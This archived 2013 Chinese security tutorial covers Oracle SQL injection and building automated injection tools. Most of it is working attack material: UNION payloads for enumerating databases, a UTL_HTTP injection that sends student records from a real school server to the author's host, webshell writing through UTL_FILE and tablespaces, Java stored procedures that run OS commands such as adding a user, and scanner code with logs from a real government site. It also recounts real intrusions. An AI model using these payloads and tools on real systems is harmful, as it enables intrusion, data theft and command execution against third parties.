# 攻击JavaWeb应用[4]-SQL注入[2]

Author: 乌云历史资料库 (@wooyun_archive)
Published: 2013-07-18T09:23:00Z
Canonical: https://wepostx.com/topics/689

> 乌云历史资料归档
>
> **原始作者：** 园长
> **原始编号：** superkieran-wooyundrops:45
> **原始发布时间：** 2013-07-18 17:23
> **声明：内容仅用于技术研究和个人使用，版权归 wooyun.org。**

---

#### 注:这一节主要是介绍Oracle和SQL注入工具相关，本应该是和前面的Mysql一起但是由于章节过长了没法看，所以就分开了。

### 0x00 Oracle

Oracle Database，又名Oracle RDBMS，或简称Oracle。是甲骨文公司的一款关系数据库管理系统。
Oracle对于MYSQL、MSSQL来说意味着更大的数据量，更大的权限。这一次我们依旧使用上面的代码，数据库结构平移到Oracle上去，数据库名用的默认的orcl，字段"corps_desc" 从text改成了VARCHAR2(4000)，JSP内的驱动和URL改成了对应的Oracle。 ￼
![原文图片](/media/2016/06/daa48f565c9494616e9b0e1c4e39fb28)

Jsp页面代码： ￼
![原文图片](/media/2016/06/707c872895706af898b12e5985399579)

开始注入：
Union +order by 永远都是最快捷最实用的，而盲注什么的太费时费力了。
依旧提交order by 去猜测显示当前页面所用的SQL查询了多少个字段，也就是确认查询字段数。
分别提交http://localhost/SqlInjection/index.jsp?id=1 AND 1=1 和?id=1 AND 1=12 得到的页面明显不一致，1=12页面没有任何数据，即1=12为false没查询到任何结果。 ￼
![原文图片](/media/2016/06/0ee0beeedf6b56979d53d604c8d17a6a)

```text
http://localhost/SqlInjection/index.jsp?id=1 AND 1=12
```
￼
![原文图片](/media/2016/06/8d32bfa348d86081eca26db999b0d08f)

提交：http://localhost/SqlInjection/index.jsp?id=1 ORDER BY 4-- 页面正常，提交：?id=1 ORDER BY 5--报错说明字段数肯定是4。
Order by 5爆出的错误信息： ￼
![原文图片](/media/2016/06/04220a601a5b60e056db03351f3e9817)

#### 使用union 进行联合查询：

##### Oracle的dual表：
dual是一个虚拟表，用来构成select的语法规则，oracle保证dual里面永远只有一条记录，在Oracle注入中用途可谓广泛。

##### Oracle union 查询 tips:
Oracle 在使用union 查询的跟Mysql不一样Mysql里面我用1,2,3,4就能占位，而在Oracle里面有比较严格的类型要求。也就是说你union select的要和前面的

```text
SELECT * from "corps" where "id" = 1
```
当中查询的字段类型一致。我们已知查询的第二个字段是corps_name，对应的数据类型是：VARCHAR2(100)，也就是字符型。当我们传入整型的数字时就会报错。比如当我们提交union查询时提交如下SQL注入语句：

```text
http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION SELECT 1,2,NULL,NULL FROM dual--
```

![原文图片](/media/2016/06/fb1bd5c66b013e1b5ce5c740aef93d79)

Oracle当中正确的注入方式用NULL去占位在我们未知哪个字段是什么类型的时候：

```text
http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION SELECT NULL,NULL,NULL,NULL FROM dual--
```
当已知第一个字段是整型的时候：

```text
http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION SELECT 1,NULL,NULL,NULL FROM dual--
```
SQL执行后的占位效果： ￼
![原文图片](/media/2016/06/e8c354cd96dead40bf17f74a1b83c783)

根据我们之前注入Mysql的经验，我们现在要尽可能多的去获取服务器信息和数据库，比如数据库版本、权限等。
在讲Mysql注入的时候已经说道要合理利用工具，在Navicat客户端执行select * from session_roles结果： ￼
![原文图片](/media/2016/06/94a8f9a7ccec78e0a63da4368f7a2c15)

##### Oracle查询分页tips：
不得不说Oracle查询分页的时候没有Mysql那么方便，Oracle可不能limit 0,1而是通过三层查询嵌套的方式实现分页(查询第一条数据“>=0<=1”取交集不就是1么？我数学5分党，如果有关数学方面的东西讲错了各位莫怪)：

```text
SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0
```

![原文图片](/media/2016/06/e6b7a1886c4663b0b9f71a79c167e619)

在Oracle里面没有类似于Mysql的group_concat,用分页去取数据，不过有更加简单的方法。

##### 用UNION SELECT 查询：

```text
http://localhost/SqlInjection/index.jsp?id=1 UNION ALL SELECT NULL, NULL, NULL, NVL(CAST(OWNER AS VARCHAR(4000)),CHR(32)) FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)--
```

![原文图片](/media/2016/06/c33c1e5b1d5d55cd353947936796194c)

￼不过我得告诉你，UNION SELECT查询返回的是多个结果，而在正常的业务逻辑当中我们取一条新闻是直接放到对应的实体当中的，比如我们查询的wooyun的厂商表：corps，那么我们做查询的很有可能是抽象出一个corps对象，在DAO层取得到单个的参数结果集，如果有多个要么报错，要么取出第一条。然后再到controller层把查询的结果放到请求里面。最终在输出的时候自然也就只能拿到单个的corps实体，这也是视图层只做展示把业务逻辑和视图分开的好处之一，等讲到MVC的时候试着给不懂的朋友解释一下。
再来看一下我们丑陋的在页面展示数据的代码： ￼
![原文图片](/media/2016/06/3b2aa32bdfad3cd9c6541ca9838ceb41)

接下来的任务就是收集信息了，上面我们已经收集到数据库所有的用户的用户名和我们当前用户的权限。
获取所有的数据库表：

```text
http://localhost/SqlInjection/index.jsp?id=1 UNION ALL SELECT NULL, NULL, NULL, NVL(CAST(OWNER AS VARCHAR(4000)),CHR(32))||CHR(45)||CHR(45)||CHR(45)||CHR(45)||CHR(45)||CHR(45)||NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TABLES WHERE OWNER IN (CHR(67)||CHR(84)||CHR(88)||CHR(83)||CHR(89)||CHR(83),CHR(69)||CHR(88)||CHR(70)||CHR(83)||CHR(89)||CHR(83),CHR(77)||CHR(68)||CHR(83)||CHR(89)||CHR(83),CHR(79)||CHR(76)||CHR(65)||CHR(80)||CHR(83)||CHR(89)||CHR(83),CHR(83)||CHR(67)||CHR(79)||CHR(84)||CHR(84),CHR(83)||CHR(89)||CHR(83),CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77),CHR(87)||CHR(77)||CHR(83)||CHR(89)||CHR(83))—
```
连接符我用的是-转换成编码也就是45 ￼
![原文图片](/media/2016/06/75f99a561102c06049979e9a1d8664a1)

已列举出所有的表名： ￼
![原文图片](/media/2016/06/d80e53ac540f1b07d827225f8827cd3d)

当UNION ALL SELECT 不起作用的时候我们可以用上面的Oracle分页去挨个读取，缺点就是效率没有UNION ALL SELECT高。
信息版本获取：

```text
http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION SELECT NULL, NULL, NULL, (select banner from sys.v_$version where rownum=1) from dual—
```

![原文图片](/media/2016/06/a063c917619e40219ea2d65b263807cb)

获取启动Oracle的用户名:

```text
select SYS_CONTEXT ('USERENV','OS_USER') from dual;
```
服务器监听IP:

```text
select utl_inaddr.get_host_address from dual;
```
服务器操作系统:

```text
select member from v$logfile where rownum=1;
```
当前连接用户:

```text
select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual;
```
获取当前连接的数据库名：

```text
select SYS_CONTEXT ('USERENV', 'DB_NAME') from dual;
```
关于获取敏感的表和字段说明：
1、获取所有的字段schema：

```text
select * from user_tab_columns
```
2、获取当前用户权限下的所有的表：

```text
SELECT * FROM User_tables
```
上述SQL通过添加Where条件就能获取到常见注入的敏感信息，请有心学习的同学按照上面的MYSQL注入时通过information_schema获取敏感字段的方式去学习user_tab_columns和FROM User_tables表。 ￼
![原文图片](/media/2016/06/48e350d2704a8197ec2d3c47f662ed0d)
 ￼
![原文图片](/media/2016/06/7522af51b21a2114e6cf37db05427d8a)

#### Oracle高级注入：

##### 1、友情备份
在讲Mysql的时候提到过怎么在注入点去构造SQL语句去实现友情备份，在去年注入某大牛学校的教务处的时候我想到了一个简单有效的SQL注入点友情备份数据库的方法。没错就是利用Oracle的utl_http包。Oracle的确是非常的强大，utl_http就能过直接对外发送Http请求。我们可以利用utl_http去SQL注入，那么我们一样可以利用utl_http去做友情备份。
构建以下SQL注入语句：

```text
http://60.xxx.xx.131/xxx/aao_66/index.jsp?fid=1+and+'1'in(SELECT+UTL_HTTP.request('http://xxx.cn:8080/xxxx/mysql.jsp?data='||ID||'----'||USERID||'----'||NAME||'----'||RELATION||'----'||OCCUPATION||'----'||POSITION||'----'||ASSN||UNIT||'----'||'----'||TEL)+FROM+STU_HOME)
```
UTL_HTTP 会带着查询数据库的结果去请求我们的URL，也就是我注入点上写的URL。Tips：UTL_HTTP是一条一条的去请求的，所以会跟数据库保持一个长连接。而数据量过大的话会导致数据丢失，如果想完整的友情备份这种方法并不是特别可行。只用在浏览器上请求这个注入点Oracle会自动的把自己的裤子送上门来那种感觉非常的好。
￼
![原文图片](/media/2016/06/291bad2f41f48a9343fdaf45b0ddc98a)

使用UTL_HTTP友情备份效果图： ￼
![原文图片](/media/2016/06/9d1475b4a04bebfdc120203ac805eb92)

utl_http在注入的时候怎么去利用同理，由于我也没有去深入了解utl_http或许他还有其他的更实用的功能等待你去发现。

##### 使用UTL_FILE友情备份：
创建目录：

```text
create or replace directory cux_log_dir as 'E:/soft/apache-tomcat-7.0.37/webapps/ROOT/selina';
```
导出数据到文件：

```text
declare frw utl_file.file_type; begin frw:=utl_file.fopen('CUX_LOG_DIR','emp.txt','w'); for rec in (select * from admin) loop utl_file.put_line(frw,rec.id||','||rec.password); end loop; utl_file.fclose(frw); end; /
```
效果图： ￼
![原文图片](/media/2016/06/8d7fe6563e2dabfccc495ae49f3aaaca)

##### GetShell
之前的各种Oracle文章似乎都提过怎样去getshell，其实方法倒是有的。但是在Java里面你要想拿到WEB的根路径比那啥还难。但是PHP什么的就不一样了，PHP里面爆个路径完全是家常便饭。因为数据库对开发语言的无关系，所以或许我们在某些场合下以下的getshell方式也是挺不错的。
在有Oracle连接权限没有webshell时候通过utl_file获取shell
（当然用户必须的具有创建DIRECTORY的权限）:
￼
![原文图片](/media/2016/06/9f2db64f6492dfee6458a60ed8c28602)

执行：

```text
create or replace directory getshell_dir as 'E:/soft/apache-tomcat-7.0.37/webapps/SqlInjection/';
```
当然了as后面跟的肯定是你的WEB路径。
执行以下SQL语句：
创建目录：

```text
create or replace directory getshell_dir as 'E:/soft/apache-tomcat-7.0.37/webapps/SqlInjection/';
```
写入shell到指定目录：注意directory在这里一定要大写:

```text
declare frw utl_file.file_type; begin frw:=utl_file.fopen('GETSHELL_DIR','yzmm.jsp','w'); utl_file.put_line(frw,'hello world.'); utl_file.fclose(frw); end; /
```

![原文图片](/media/2016/06/aa54196f7550b56379e653f83bcd56a4)

在低权限下getshell： ￼
![原文图片](/media/2016/06/93bb79cab374089bea42795de42bd76b)

执行以下SQL创建表空间：

```text
create tablespace shell datafile 'E:/soft/apache-tomcat-7.0.37/webapps/SqlInjection/shell.jsp' size 100k nologging ; CREATE TABLE SHELL(C varchar2(100)) tablespace shell; insert into SHELL values('hello world'); commit; alter tablespace shell offline; drop tablespace shell including contents;
```
这方法是能写文件，但是好像没发现我的hello world，难道是我打开方式不对？
Oracle SQLJ编译执行Java代码：
众所周知，由于sun那只土鳖不争气居然被oracle给收购了。
不过对Oracle来说的确是有有不少优势的。
SQLJ是一个与Java编程语言紧密集成的嵌入式SQL的版本，这里"嵌入式SQL"是用来在其宿主通用编程语言如C、C++、Java、Ada和COBOL）中调用SQL语句。SQL翻译器用SQLJ运行时库中的调用来替代嵌入式SQLJ语句，该运行时库真正实现SQL操作。这样翻译的结果是得到一个可使用任何Java翻译器进行编译的Java源程序。一旦Java源程序被编译，Java执行程序就可在任何数据库上运行。SQLJ运行环境由纯Java实现的小SQLJ运行库（小，意指其中包括少量的代码）组成，该运行时库转而调用相应数据库的JDBC驱动程序。
SQLJ可以这样玩：首先创建一个类提供一个静态方法： ￼
![原文图片](/media/2016/06/a9e539c49ba4316638965fc3246fe314)

其中的getShell是我们的方法名，p和才是参数，p是路径，而c是要写的文件内容。在创建Java存储过程的时候方法类型必须是静态的static
执行以下SQL创建Java储存过程：

```text
create or replace and compile java source named "getShell" as public class GetShell {public static int getShell(String p, String c) {int RC = -1;try {new java.io.FileOutputStream(p).write(c.getBytes());RC = 1;} catch (Exception e) {e.printStackTrace();}return RC;}}
```
创建函数：

```text
create or replace function getShell(p in varchar2, c in varchar2) return number as language java name 'util.getShell(java.lang.String, java.lang.String) return Integer';
```
创建存储过程：

```text
create or replace procedure RC(p in varChar, c in varChar) as x number; begin x := getShell(p,c); end;
```
授予Java权限：

```text
variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system; grant javauserpriv to system;
```
写webshell：

```text
exec :x:=getShell('d:/3.txt','selina');
```

![原文图片](/media/2016/06/cc2d1e580f7ef994a8c8385132b4df18)

##### SQLJ执行cmd命令：
方法这里和上面几乎大同小异，一样的提供一个静态方法，然后去创建一个存储过程。然后调用Java里的方法去执行命令。
创建Java存储过程:

```text
create or replace and compile java source named "Execute" as import java.io.BufferedReader; import java.io.InputStreamReader; public class Execute { public static void executeCmd(String c) { try { String l="",t; BufferedReader br = new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec(c).getInputStream(),"gbk")); while((t=br.readLine())!=null){ l+=t+"\n"; } System.out.println(l); } catch (Exception e) { e.printStackTrace(); } } }
```
创建存储过程executeCmd：

```text
create or replace procedure executeCmd(c in varchar2) as language java name 'Execute.executeCmd(java.lang.String)';
```
执行存储过程：

```text
exec executeCmd('net user selina 123 /add');
```

![原文图片](/media/2016/06/cf19dae5fd4508a66b93185b5a1968ad)

上面提供的命令执行和getshell创建方式对换一下就能回显了，如果好不清楚怎么让命令执行后回显可以参考：
[http://hi.baidu.com/xpy_home/item/09cbd9f3fd30ef0585d27833](http://hi.baidu.com/xpy_home/item/09cbd9f3fd30ef0585d27833)
一个不错的SQLJ的demo（犀利的 oracle 注入技术）。
[http://huaidan.org/archives/2437.html](http://huaidan.org/archives/2437.html)

### 0x01 自动化的SQL注入工具实现

通过上面我们对数据库和SQL注入的熟悉，现在可以自行动手开发注入工具了吧？
很久以前非常粗糙的写了一个SQL注入工具类，就当作demo给大家做个演示了。
仅提供核心代码，案例中的gov网站请勿非常攻击！
简单的SQL Oder by 注入实现的方式核心代码：
1、分析

```text
URLpublic static void AnalysisUrls(String site) throws Exception
```
这个方法主要是去分析URL的组成是否静态化等。
2、检测是否存在：
这个做的粗糙了些，只是通过请求提交不同的SQL注入语句去检测页面返回的情况：

```text
/** * 分析SQL参数是否存在注入 * @param str */ public static void AnalysisUrlDynamicParamSqlInjection(String str[]) { Map<String,Object> content,content2; sqlKey = new ArrayList<Object>(); content = HttpHelper.sendGet(protocol+"://"+schema+":"+port+"/"+filesIndex+"/"+file,parameter);//原始的请求包 int len1 = content.get("content").toString().length();//原始请求的response长度 boolean typeIsNumber = false; String c1[] = {"'","-1",")\"\"\"\"\"()()",")+ANd+3815=3835+ANd+(1471=1471",") ANd+9056=9056+ANd+(9889=9889"," ANd+6346=6138 "," ANd+9056=9056"};//需要检查的对象 for (int i = 0; i < str.length; i++) { typeIsNumber = StringUtil.isNotEmpty(str[i].split("="))&&StringUtil.isNum(str[i].split("=")[1])?true:false; for (int j = 0; j < c1.length; j++) { content2 = HttpHelper.sendGet(protocol+"://"+schema+":"+port+"/"+filesIndex+"/"+file,parameter.replace(str[i], str[i].split("=")[0]+"="+str[i].split("=")[1]+c1[j])); if (len1 != content2.get("content").toString().length()||(Integer)content2.get("status")!=200) { existsInjection = true; sqlKey.add(str[i]); break ; } } } if (existsInjection) { // System.out.println(existsInjection?"Site:"+url+" 可能存在"+(typeIsNumber?"int":"String")+"型Sql注入"+"SQL注入.":"Not Found."); getSelectColumnCount(str); getDatabaseInfo(); } }
```
检测过程主要发送了几次请求，一次正常的请求和N次带有SQL注入的请求。如果SQL注入的请求和正常请求的结果不一致（有不可控因素，比如SQLMAP的实现方式就有去计算页面是否稳定，从而让检测出来的结果更加准确）就可能是存在SQL注入。
日志如下：

```text
url:http://www.tchjbh.gov.cn:80//news_display.php param:id=148 url:http://www.tchjbh.gov.cn:80//news_display.php param:id=148' url:http://www.tchjbh.gov.cn:80//news_display.php param:id=148
```
获取字段数主要是通过：

```text
/** * 获取查询字段数 * @param str */ public static int getSelectColumnCount(String str[]){ Map<String,Object> sb = HttpHelper.sendGet(protocol+"://"+schema+":"+port+"/"+filesIndex+"/"+file,parameter);//原始的请求包 int len1 = sb.get("content").toString().length();//原始请求的response长度 int count = -1; for (Object o : sqlKey) { count = getSbCount(o.toString(), len1);//计算字段 } return count; } /** *获取order by 字段数 * @param key * @param len1 * @return */ public static int getSbCount(String key,int len1){ System.out.println("-----------------------end:"+end+"-----------------------------"); Map<String,Object> sb = HttpHelper.sendGet(uri, parameter.replace(key, key+"+orDer+By+"+end+"+%23")); if (1 == end|| len1==((String)sb.get("content")).length()&&200==(Integer)sb.get("status")) { System.out.println("index:"+end); start = end; for (int i = start; i < 2*start+1; i++) { System.out.println("************开始精确匹配*****************"); Map<String,Object> sb2 = HttpHelper.sendGet(uri, parameter.replace(key, key+"+orDer+By+"+end+"+%23")); Map<String,Object> sb3 = HttpHelper.sendGet(uri, parameter.replace(key, key+"+orDer+By+"+(end+1)+"+%23")); if (((String)sb3.get("content")).length()!=((String)sb2.get("content")).length()&&200==(Integer)sb2.get("status")) { System.out.println("order by 字段数为:"+end); sbCount = end;//设置字段长度为当前检测出来的长度 return index = end; }else { end++; } } }else { end = end/2; getSbCount(key, len1); } return index; }
```
利用检测是否存在SQL注入的原理同样能过检测出查询的字段数。我们通过二分去order一个by 一个数然后去请求分析页面一致性。然后不停的去修改数值最终结果相等即可获得字段数。上面的分析的代码挺简单的，有兴趣的同学自己去看。日志如下：

```text
************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+15+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+16+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+16+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+17+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+17+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+18+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+18+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+19+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+19+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+20+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+20+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+21+%23 ************开始精确匹配***************** url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+21+%23 url:http://www.tchjbh.gov.cn/news_display.php param:id=148+orDer+By+22+%23 order by 字段数为:21 skey:id=148
```
在知道了字段数后我们就可以通过构建关键字的方式去获取SQL注入查询的结果，我们的目的无外乎就是不停的递交SQL注入语句，把我们想要得到的数据库的信息展示在页面，然后我们通过自定义的关键字去取回信息到本地：

```text
/** * 测试，获取数据库表信息 */ public static void getDatabaseInfo(){ String skey = sqlKey.get(0).toString(); System.out.println("skey:"+skey); StringBuilder union = new StringBuilder(); for (int i = 0; i < sbCount; i++) { union.append("concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),"); } Map<String,Object> sb = HttpHelper.sendGet(uri, parameter.replace(skey, skey+("-1+UnIon+SeleCt+"+(union.delete(union.length()-1, union.length()))+"%23"))); String rs = ((String)sb.get("content")); String user = rs.substring(rs.lastIndexOf("[user]")+6,rs.lastIndexOf("[/user]")); String version = rs.substring(rs.lastIndexOf("[version]")+9,rs.lastIndexOf("[/version]")); String database = rs.substring(rs.lastIndexOf("[database]")+10,rs.lastIndexOf("[/database]")); System.err.println("user:"+user); System.err.println("version:"+version); System.err.println("database:"+database); }
```
代码执行的日志：

```text
url:http://www.tchjbh.gov.cn/news_display.php param:id=148-1+UnIon+SeleCt+concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]'),concat('[mjj]','[version]',version(),'[/version]','[user]',user(),'[/user]','[database]',database(),'[/database]','[/mjj]')%23 user: [email protected] version:5.1.56-community database:tchjbh
```

### 0x02 模拟SQL注入分析注入工具原理

下面这个演示是针对想自己拓展上面写的SQL注入工具的同学。这次我才用的是PHP语言去弄清SQL注入工具的具体实现。数据库采用的是wordpress的结构，数据库结构如下,建议在本地先安装好wordpress任意版本：
￼
![原文图片](/media/2016/06/ca835153009ba53ccd7cade57279719a)

代码如下：

```text
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <style> .main{margin:0 auto;width:980px;border:1px dashed } .title{line-height:25px; text-align:center; font-size:18px; font-weight:500} pre{text-indent: 2em; margin:20px auto 10px 20px;} </style> <title></title> </head> <body> <div class="main"> <?php extract($_GET);//to Map if(!empty($id)){ $con = mysql_connect("localhost","root","111111");//连接数据库 $db_selected = mysql_select_db("wps",$con);//选择数据库 mysql_query("SET NAMES 'GBK'"); //设置编码 $sql = "SELECT * from wps_posts where ID = ".$id;//查询文章语句 echo "<font color=red>".$sql."</font>";//打印SQL /*截取SQL注入工具的SQL*/ $paths="getsql.txt";//定义要生成的html路径 $handles=fopen($paths,"a");//以可写方式打开路径 fwrite($handles,$sql."\t\t\n\n\n");//写入内容 fclose($handles);//关闭打开的文件 $result = mysql_query($sql,$con);//执行查询 /*结果遍历*/ while ($row=mysql_fetch_array($result)) { echo "<div class=title>".$row['post_title']."</div>";//把结果输出到界面 echo "<pre>".$row['post_content']."</pre>";//文章内容 } mysql_close($con);//关闭数据库连接 } ?> </div> </body> </html>
```
建立好数据库和表之后访问（由于我采用的是自己的wp博客，所有有大量的测试数据如果没有数据建议安装个wordpress方便以后的测试）： ￼
![原文图片](/media/2016/06/8ee16a93c9d7964d383d358a548e833f)

SQL注入测试：
￼
![原文图片](/media/2016/06/118bc0677fc83be07ccf9743791a015b)

让我们来看下m4xmysql究竟在SQL注入点提交了那些数据,点击start我们的PHP程序会自动在同目录下生成一个getsql.txt打开后发现我们截获到如下SQL：
￼
![原文图片](/media/2016/06/a13ad526a217d16ee75156b74ba9fdea)

![原文图片](/media/2016/06/60625cc7c8ddfc0c42ab3ea7fa58964e)

看起来不算多，因为我没有自动换行，以上是在获取数据库相关信息。
让我来带着大家翻译这些SQL都做了些什么：

```text
/*检测该URL是否存在SQL注入*/ SELECT * from wps_posts where ID = 739 and 1=0 SELECT * from wps_posts where ID = 739 and 1=1 /*这条sql开始查询的字段数，请注意是查询的字段数而不是表的字段数！*/ SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b68345d,0,0x5b2f68345d)-- SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b68345d,0,0x5b2f68345d),concat(0x5b68345d,1,0x5b2f68345d)-- SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b68345d,0,0x5b2f68345d),concat(0x5b68345d,1,0x5b2f68345d),concat(0x5b68345d,2,0x5b2f68345d)-- /*........................省去其中的无数次字段长度匹配尝试................................*/ /*匹配出来SELECT * from wps_posts where ID = 739一共查询了10个字段*/ /*那么他是怎么判断出字段数10就是查询的长度的呢？答案很简单提交以下SQL占位10个页面显示正常而前面提交的都错误所以得到的数量自然就是10了。获取请求的http status或许应该就行了*/ SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b68345d,0,0x5b2f68345d),concat(0x5b68345d,1,0x5b2f68345d),concat(0x5b68345d,2,0x5b2f68345d),concat(0x5b68345d,3,0x5b2f68345d),concat(0x5b68345d,4,0x5b2f68345d),concat(0x5b68345d,5,0x5b2f68345d),concat(0x5b68345d,6,0x5b2f68345d),concat(0x5b68345d,7,0x5b2f68345d),concat(0x5b68345d,8,0x5b2f68345d),concat(0x5b68345d,9,0x5b2f68345d),concat(0x5b68345d,10,0x5b2f68345d),concat(0x5b68345d,11,0x5b2f68345d),concat(0x5b68345d,12,0x5b2f68345d),concat(0x5b68345d,13,0x5b2f68345d),concat(0x5b68345d,14,0x5b2f68345d),concat(0x5b68345d,15,0x5b2f68345d),concat(0x5b68345d,16,0x5b2f68345d),concat(0x5b68345d,17,0x5b2f68345d),concat(0x5b68345d,18,0x5b2f68345d),concat(0x5b68345d,19,0x5b2f68345d),concat(0x5b68345d,20,0x5b2f68345d),concat(0x5b68345d,21,0x5b2f68345d),concat(0x5b68345d,22,0x5b2f68345d)--
```
以上的SQL完成了注入点（http://localhost/Test/1.php?id=739执行的SELECT * from wps_posts where ID = 739）的类型、是否存在和字段数量的检测 里面有许多的0x5b2f68345d转换过来其实就是占位符，为了让工具扒下源代码后能够在页面类找到具有特殊意义的字符并进行截取：

![原文图片](/media/2016/06/5d4a802988d31e80ea02437b94ec13a6)
 ￼ 如果你足够聪明或仔细会发现他这样写有点浪费资源，因为他的order 是从1一直递增到争取的长度的假如字段特别长（一般情况下还是很少出现的）可能要执行几十个甚至是更多的HTTP请求，如果这里使用二分法或许可以很好的解决吧。
我们接着往下看（还是点击start后发送的请求）：

```text
/*获取数据库相关信息*/ SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d